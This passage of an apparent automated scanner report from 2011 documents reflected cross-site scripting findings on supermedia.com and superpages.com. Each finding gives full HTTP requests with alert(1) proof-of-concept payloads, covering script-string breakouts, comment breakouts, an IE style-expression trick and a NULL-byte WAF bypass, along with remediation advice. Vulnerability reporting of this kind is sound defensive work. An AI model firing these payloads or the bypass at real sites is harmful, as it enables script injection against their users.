The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:45 GMT Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/ Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:33 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:13 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/
1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:20 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow"> ...[SNIP]...
1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:16 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57268 Date: Thu, 03 Feb 2011 17:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/ Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:29:25 GMT Content-Length: 66686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... ype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:57 GMT Content-Length: 66498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... tp://yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'ht ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/ Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:18 GMT Content-Length: 128435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');"> ...[SNIP]...
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/ Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:33 GMT Content-Length: 126537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ww.superpages.com"; s.prop5 = "Advanced Search, Business Profile"; s.prop9 = "Advanced Search"; s.eVar23 = "Advanced Search"; s.hier1 = "Advanced Search, Business Profile"; var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516"; if(s_campaign){ s.campaign = s_campaign; } var s_code = s.t(); if(s_code) document.writeln(s_code); //--> ...[SNIP]...
The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/ Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:23 GMT Connection: close Content-Length: 23380
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/ Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:03 GMT Content-Length: 66496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... archtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/ Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:28:30 GMT Content-Length: 60956
